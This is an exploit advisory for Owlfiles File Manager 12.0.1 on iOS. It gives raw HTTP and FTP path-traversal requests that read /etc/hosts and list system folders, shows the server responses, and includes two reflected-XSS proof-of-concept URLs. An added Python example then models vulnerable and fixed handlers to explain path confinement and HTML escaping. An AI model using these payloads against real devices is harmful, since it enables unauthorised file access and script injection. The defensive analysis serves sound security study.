Owlfiles File Manager 12.0.1 Path Traversal / Local File Inclusion


Owlfiles File Manager version 12.0.1 suffers from local file inclusion and path traversal vulnerabilities.

SHA-256 | 5e1df728b64bebf1797218fca034b9eeed532e773c31131307d679d65b406b40

# Exploit Title: Owlfiles File Manager 12.0.1 - multiple vulnerabilities
# Date: Sep 19, 2022
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://www.skyjos.com/
# Software Link: https://apps.apple.com/us/app/owlfiles-file-manager/id510282524
# Version: 12.0.1
# Tested on: iOS 16.0

###########
path traversal on HTTP built-in server
###########

GET /../../../../../../../../../../../../../../../System/ HTTP/1.1
Host: 192.168.8.101:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e Safari/8536.25
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
If-None-Match: 42638202/1663558201/177889085
If-Modified-Since: Mon, 19 Sep 2022 03:30:01 GMT
Connection: close
Content-Length: 0

-------
HTTP/1.1 200 OK
Cache-Control: max-age=3600, public
Content-Length: 317
Content-Type: text/html; charset=utf-8
Connection: Close
Server: GCDWebUploader
Date: Mon, 19 Sep 2022 05:01:11 GMT

<!DOCTYPE html>
<html><head><meta charset="utf-8"></head><body>
<ul>
<li><a href="Cryptexes/">Cryptexes/</a></li>
<li><a href="DriverKit/">DriverKit/</a></li>
<li><a href="Library/">Library/</a></li>
<li><a href="Applications/">Applications/</a></li>
<li><a href="Developer/">Developer/</a></li>
</ul>
</body></html>

#############
LFI on HTTP built-in server
#############

GET /../../../../../../../../../../../../../../../etc/hosts HTTP/1.1
Host: 192.168.8.101:8080
Accept: application/json, text/javascript, */*; q=0.01
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e Safari/8536.25
X-Requested-With: XMLHttpRequest
Referer: http://192.168.8.101:8080/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

----

HTTP/1.1 200 OK
Connection: Close
Server: GCDWebUploader
Content-Type: application/octet-stream
Last-Modified: Sat, 03 Sep 2022 01:37:01 GMT
Date: Mon, 19 Sep 2022 03:28:14 GMT
Content-Length: 213
Cache-Control: max-age=3600, public
Etag: 1152921500312187994/1662169021/0

##
# Host Database
#
# localhost is used to configure the loopback interface
# when the system is booting. Do not change this entry.
##
127.0.0.1 localhost
255.255.255.255 broadcasthost
::1 localhost

###############
path traversal on FTP built-in server
###############

ftp> cd ../../../../../../../../../
250 OK. Current directory is /../../../../../../../../../
ftp> ls
200 PORT command successful.
150 Accepted data connection
total 10
drwxr-xr-x 0 root wheel 256 Jan 01 1970 usr
drwxr-xr-x 0 root wheel 128 Jan 01 1970 bin
drwxr-xr-x 0 root wheel 608 Jan 01 1970 sbin
drwxr-xr-x 0 root wheel 224 Jan 01 1970 System
drwxr-xr-x 0 root wheel 640 Jan 01 1970 Library
drwxr-xr-x 0 root wheel 224 Jan 01 1970 private
drwxr-xr-x 0 root wheel 1131 Jan 01 1970 dev
drwxr-xr-x 0 root admin 4512 Jan 01 1970 Applications
drwxr-xr-x 0 root admin 64 Jan 01 1970 Developer
drwxr-xr-x 0 root admin 64 Jan 01 1970 cores
WARNING! 10 bare linefeeds received in ASCII mode
File may not have transferred correctly.
226 Transfer complete.
ftp>

#############
XSS on HTTP built-in server
#############

poc 1:

http://192.168.8.101:8080/download?path=<script>alert(rose)</script>

poc 2:

http://192.168.8.101:8080/list?path=<script>alert(rose)</script>
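The three HTTP/FTP traversal findings and the two reflected XSS PoCs above are the same two handler mistakes seen from different ports: the client-supplied path is joined onto the share root without confinement, and it is echoed back into HTML without escaping. The following is an added example written for this page (it is not Owlfiles or GCDWebUploader code) that models both handlers in Python, the naive version beside a confined/escaped version, and runs the advisory's own payloads through them. The share root `ROOT`, the percent-encoded variant, and the error-page markup are assumptions for illustration.

```python
"""Traversal and reflected-XSS model for a file-sharing HTTP/FTP handler.

Added example for this page; not the vendor's code. ROOT, the error-page
markup and the extra test inputs are assumptions made for illustration.
"""
import html
import posixpath
from typing import Optional
from urllib.parse import unquote

# Assumed share root of the app's built-in server (not taken from the advisory).
ROOT = "/var/mobile/Containers/Data/Application/APP-UUID/Documents"

# Payloads taken from the advisory above, plus one constructed encoded variant.
POC_HOSTS = "/../../../../../../../../../../../../../../../etc/hosts"
POC_SYSTEM = "/../../../../../../../../../../../../../../../System/"
POC_FTP = "../../../../../../../../../"
POC_ENCODED = "%2e%2e/%2e%2e/%2e%2e/etc/hosts"  # constructed
POC_XSS = "<script>alert(rose)</script>"


def vulnerable_resolve(root: str, requested: str) -> str:
    """What a naive handler ends up opening: root + client path, '..' intact.

    normpath here only shows where the OS would land; the naive server never
    checks that the result is still under root.
    """
    return posixpath.normpath(posixpath.join(root, requested.lstrip("/")))


def confined_resolve(root: str, requested: str) -> Optional[str]:
    """Decode, normalise, then refuse anything whose final location leaves root.

    Returns the resolved path or None if the request must be rejected.
    Note: this is a lexical check; a real server must also resolve symlinks
    (realpath) before comparing, which the in-memory model cannot do.
    """
    decoded = unquote(unquote(requested))  # handle %2e%2e and double-encoding
    if "\x00" in decoded:
        return None  # NUL would truncate the path in C string APIs
    # Strip the leading slash so an absolute client path cannot replace root.
    candidate = posixpath.normpath(posixpath.join(root, decoded.lstrip("/")))
    # normpath collapses '..' against the root prefix; commonpath is only safe
    # AFTER that, because it compares components lexically.
    if posixpath.commonpath([root, candidate]) != root:
        return None
    return candidate


def vulnerable_error_page(requested: str) -> str:
    """Echoes ?path= straight into the response body (reflected XSS)."""
    return f"<p>Path not found: {requested}</p>"


def safe_error_page(requested: str) -> str:
    """Escapes the reflected value for an HTML text context."""
    return f"<p>Path not found: {html.escape(requested, quote=True)}</p>"


def reflects_unescaped(body: str, payload: str) -> bool:
    """Detection helper: does the raw payload appear verbatim in the body?"""
    return payload in body


def run_pocs() -> dict:
    """Run the advisory's payloads through both handler versions."""
    return {
        "hosts_naive": vulnerable_resolve(ROOT, POC_HOSTS),
        "hosts_confined": confined_resolve(ROOT, POC_HOSTS),
        "system_confined": confined_resolve(ROOT, POC_SYSTEM),
        "ftp_confined": confined_resolve(ROOT, POC_FTP),
        "encoded_confined": confined_resolve(ROOT, POC_ENCODED),
        "legit_confined": confined_resolve(ROOT, "photos/../notes.txt"),
        "xss_naive": reflects_unescaped(vulnerable_error_page(POC_XSS), POC_XSS),
        "xss_safe": reflects_unescaped(safe_error_page(POC_XSS), POC_XSS),
    }


if __name__ == "__main__":
    for name, value in run_pocs().items():
        print(f"{name:18} -> {value!r}")
```

The naive join lands on `/etc/hosts` because fifteen `..` segments walk past the seven components of the root and `normpath` clamps at `/`, which is exactly what the FTP `250 OK. Current directory is /../../...` response shows the server doing for real. The order of operations in `confined_resolve` matters: `commonpath` compares components lexically, so checking it before `normpath` would accept `ROOT/../../etc/hosts` as "under ROOT".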
